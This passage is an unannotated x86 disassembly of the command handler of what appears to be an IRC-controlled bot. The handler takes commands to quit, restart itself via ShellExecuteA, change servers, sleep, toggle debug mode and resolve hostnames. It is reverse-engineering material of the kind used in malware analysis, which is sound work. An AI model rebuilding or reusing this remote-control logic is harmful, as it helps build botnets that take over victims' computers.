test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_41ECD0
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset dword_41EBBC
push offset dword_41ECD0
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41EFD8
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41EFD8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset dword_41EBBC
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41DB3C
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DEC0
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
push offset dword_41EDD8
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EDD8
push offset dword_41DB3C
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DEC0
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419AB0
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp dword_41DEC8, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov dword_41DEC8, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and dword_41DEC8, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset dword_419A3C
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0 ; ShellExecuteA
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DEC0
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DF14 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call dword_41DF18 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call dword_41DF1C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DEC0
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DF14 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call dword_41DF18 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call dword_41DF1C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call dword_41DF1C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
